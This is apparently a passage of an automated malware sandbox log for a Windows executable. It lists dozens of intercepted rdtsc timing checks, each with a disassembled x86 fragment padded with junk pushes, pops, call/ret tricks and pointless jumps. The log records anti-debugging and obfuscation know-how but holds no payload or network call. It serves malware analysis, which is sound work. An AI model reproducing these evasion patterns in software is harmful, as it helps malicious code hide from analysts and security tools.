Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1011FDA second address: 1011FE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1011FE7 second address: 1011FF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FB19901BDD6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1011FF2 second address: 1011FF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 101243E second address: 101244A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 101244A second address: 1012466 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB19901BD14h 0x00000009 popad 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10125A4 second address: 10125BF instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB19901BDDCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jnc 00007FB19901BDE4h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1018048 second address: 101804C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 101804C second address: 101805A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007FB19901BDD8h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 101805A second address: 1018066 instructions: 0x00000000 rdtsc 0x00000002 je 00007FB19901BD0Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1018066 second address: 1018080 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FB19901BDDEh 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1018080 second address: 1018093 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB19901BD0Dh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1018093 second address: 10180B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB19901BDE8h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10180B2 second address: 10180C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 js 00007FB19901BD0Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1017483 second address: 10174B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB19901BDE2h 0x00000008 jmp 00007FB19901BDE9h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1017762 second address: 101777E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BD12h 0x00000007 jp 00007FB19901BD06h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 101777E second address: 1017783 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 101792F second address: 1017934 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1017CF9 second address: 1017CFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1017CFD second address: 1017D0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007FB19901BD08h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1017D0B second address: 1017D1D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BDDDh 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1017EB7 second address: 1017EBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1018FB6 second address: 1018FC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FB19901BDD6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1018FC1 second address: 1018FC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1018FC7 second address: 1018FCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 101908A second address: 10190A2 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB19901BD06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f je 00007FB19901BD0Eh 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10190A2 second address: 10190E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 mov eax, dword ptr [eax] 0x00000007 jmp 00007FB19901BDE8h 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 js 00007FB19901BDE9h 0x00000018 jmp 00007FB19901BDE3h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10190E0 second address: 10190E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10191CD second address: 10191D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10191D1 second address: 10191DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 101947B second address: 1019489 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB19901BDD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1019489 second address: 101948D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1019B3F second address: 1019B43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1019B43 second address: 1019B47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1019D4C second address: 1019D52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1019D52 second address: 1019D56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 101A087 second address: 101A0A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BDE4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007FB19901BDD6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 101A0A9 second address: 101A0B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 101A11C second address: 101A121 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 101A121 second address: 101A131 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB19901BD0Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 101A131 second address: 101A169 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB19901BDD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov di, bx 0x00000010 xchg eax, ebx 0x00000011 push ecx 0x00000012 jmp 00007FB19901BDE0h 0x00000017 pop ecx 0x00000018 push eax 0x00000019 je 00007FB19901BDEEh 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FB19901BDDCh 0x00000026 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 101A673 second address: 101A6F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BD0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jp 00007FB19901BD15h 0x00000010 nop 0x00000011 or edi, 13CDB2C1h 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push ebp 0x0000001c call 00007FB19901BD08h 0x00000021 pop ebp 0x00000022 mov dword ptr [esp+04h], ebp 0x00000026 add dword ptr [esp+04h], 0000001Bh 0x0000002e inc ebp 0x0000002f push ebp 0x00000030 ret 0x00000031 pop ebp 0x00000032 ret 0x00000033 mov dword ptr [ebp+1245EBA0h], edx 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push edx 0x0000003e call 00007FB19901BD08h 0x00000043 pop edx 0x00000044 mov dword ptr [esp+04h], edx 0x00000048 add dword ptr [esp+04h], 00000018h 0x00000050 inc edx 0x00000051 push edx 0x00000052 ret 0x00000053 pop edx 0x00000054 ret 0x00000055 xchg eax, ebx 0x00000056 push eax 0x00000057 push eax 0x00000058 push edx 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 101A6F5 second address: 101A6F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 101A6F9 second address: 101A717 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007FB19901BD10h 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 101C0FA second address: 101C100 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 101B8A1 second address: 101B8A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 101CAF4 second address: 101CB17 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB19901BDD8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FB19901BDE4h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 101D4D6 second address: 101D547 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BD0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jnp 00007FB19901BD0Ah 0x00000010 push ebx 0x00000011 pushad 0x00000012 popad 0x00000013 pop ebx 0x00000014 nop 0x00000015 push 00000000h 0x00000017 push ebx 0x00000018 call 00007FB19901BD08h 0x0000001d pop ebx 0x0000001e mov dword ptr [esp+04h], ebx 0x00000022 add dword ptr [esp+04h], 00000019h 0x0000002a inc ebx 0x0000002b push ebx 0x0000002c ret 0x0000002d pop ebx 0x0000002e ret 0x0000002f mov edi, dword ptr [ebp+122D29B5h] 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push esi 0x0000003a call 00007FB19901BD08h 0x0000003f pop esi 0x00000040 mov dword ptr [esp+04h], esi 0x00000044 add dword ptr [esp+04h], 00000019h 0x0000004c inc esi 0x0000004d push esi 0x0000004e ret 0x0000004f pop esi 0x00000050 ret 0x00000051 push 00000000h 0x00000053 mov di, 274Fh 0x00000057 xchg eax, ebx 0x00000058 push ecx 0x00000059 push eax 0x0000005a push edx 0x0000005b push ecx 0x0000005c pop ecx 0x0000005d rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 101D547 second address: 101D55C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FB19901BDDBh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 101DF9A second address: 101DFA0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 101F6D9 second address: 101F6F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB19901BDE9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 101DD3E second address: 101DD60 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BD16h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pushad 0x0000000f popad 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1024F11 second address: 1024F18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1024F18 second address: 1024F1D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10255BA second address: 10255BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10255BE second address: 1025619 instructions: 0x00000000 rdtsc 0x00000002 js 00007FB19901BD06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b and edi, 03265591h 0x00000011 push 00000000h 0x00000013 mov ebx, 0F83C836h 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ebp 0x0000001d call 00007FB19901BD08h 0x00000022 pop ebp 0x00000023 mov dword ptr [esp+04h], ebp 0x00000027 add dword ptr [esp+04h], 00000018h 0x0000002f inc ebp 0x00000030 push ebp 0x00000031 ret 0x00000032 pop ebp 0x00000033 ret 0x00000034 and edi, 362F207Bh 0x0000003a xchg eax, esi 0x0000003b jmp 00007FB19901BD0Fh 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 ja 00007FB19901BD08h 0x00000049 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10265BE second address: 10265C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1027559 second address: 102755F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1026764 second address: 102676A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1027798 second address: 10277C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BD19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007FB19901BD0Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 102676A second address: 1026803 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB19901BDE7h 0x00000008 jbe 00007FB19901BDD6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov dword ptr [esp], eax 0x00000014 jmp 00007FB19901BDE2h 0x00000019 push dword ptr fs:[00000000h] 0x00000020 push 00000000h 0x00000022 push eax 0x00000023 call 00007FB19901BDD8h 0x00000028 pop eax 0x00000029 mov dword ptr [esp+04h], eax 0x0000002d add dword ptr [esp+04h], 00000019h 0x00000035 inc eax 0x00000036 push eax 0x00000037 ret 0x00000038 pop eax 0x00000039 ret 0x0000003a mov edi, 167DE1CAh 0x0000003f xor ebx, dword ptr [ebp+122D2B25h] 0x00000045 mov edi, dword ptr [ebp+122D2B0Dh] 0x0000004b mov dword ptr fs:[00000000h], esp 0x00000052 mov dword ptr [ebp+122D39DEh], edi 0x00000058 mov eax, dword ptr [ebp+122D0C95h] 0x0000005e mov edi, esi 0x00000060 push FFFFFFFFh 0x00000062 cld 0x00000063 nop 0x00000064 push eax 0x00000065 push edx 0x00000066 jmp 00007FB19901BDDDh 0x0000006b rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10295C2 second address: 10295D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FB19901BD0Ch 0x0000000e rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10277C0 second address: 10277C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 102DD5F second address: 102DD63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 102DD63 second address: 102DD6D instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB19901BDD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 102DD6D second address: 102DDBB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BD16h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c sub edi, 71578181h 0x00000012 or dword ptr [ebp+122D3197h], esi 0x00000018 push 00000000h 0x0000001a jng 00007FB19901BD16h 0x00000020 jnc 00007FB19901BD10h 0x00000026 push 00000000h 0x00000028 mov dword ptr [ebp+12456274h], esi 0x0000002e xchg eax, esi 0x0000002f pushad 0x00000030 pushad 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 102DDBB second address: 102DDC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 102DDC1 second address: 102DDC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 102ED50 second address: 102ED9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 nop 0x00000007 call 00007FB19901BDE6h 0x0000000c call 00007FB19901BDE5h 0x00000011 mov bl, 8Dh 0x00000013 pop ebx 0x00000014 pop edi 0x00000015 push 00000000h 0x00000017 cld 0x00000018 push 00000000h 0x0000001a mov edi, dword ptr [ebp+122D1A2Ch] 0x00000020 xchg eax, esi 0x00000021 pushad 0x00000022 jng 00007FB19901BDDCh 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 102ED9B second address: 102EDA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 102A72C second address: 102A730 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 102A730 second address: 102A73E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BD0Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 102A87C second address: 102A891 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 pop esi 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push edi 0x0000000e push esi 0x0000000f pop esi 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 102A891 second address: 102A895 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1030D3C second address: 1030D4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FB19901BDD6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1030D4B second address: 1030D4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1030D4F second address: 1030D61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b jbe 00007FB19901BDD6h 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1030D61 second address: 1030D67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 102CF08 second address: 102CF28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 jmp 00007FB19901BDE2h 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1031D8B second address: 1031DDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push esi 0x0000000b call 00007FB19901BD08h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], esi 0x00000015 add dword ptr [esp+04h], 0000001Bh 0x0000001d inc esi 0x0000001e push esi 0x0000001f ret 0x00000020 pop esi 0x00000021 ret 0x00000022 mov edi, dword ptr [ebp+122D37F3h] 0x00000028 mov ebx, dword ptr [ebp+122D2DAEh] 0x0000002e push 00000000h 0x00000030 mov ebx, dword ptr [ebp+122D2C21h] 0x00000036 push 00000000h 0x00000038 and edi, dword ptr [ebp+124496F4h] 0x0000003e xchg eax, esi 0x0000003f js 00007FB19901BD14h 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 106F161 second address: 106F17D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007FB19901BDE2h 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
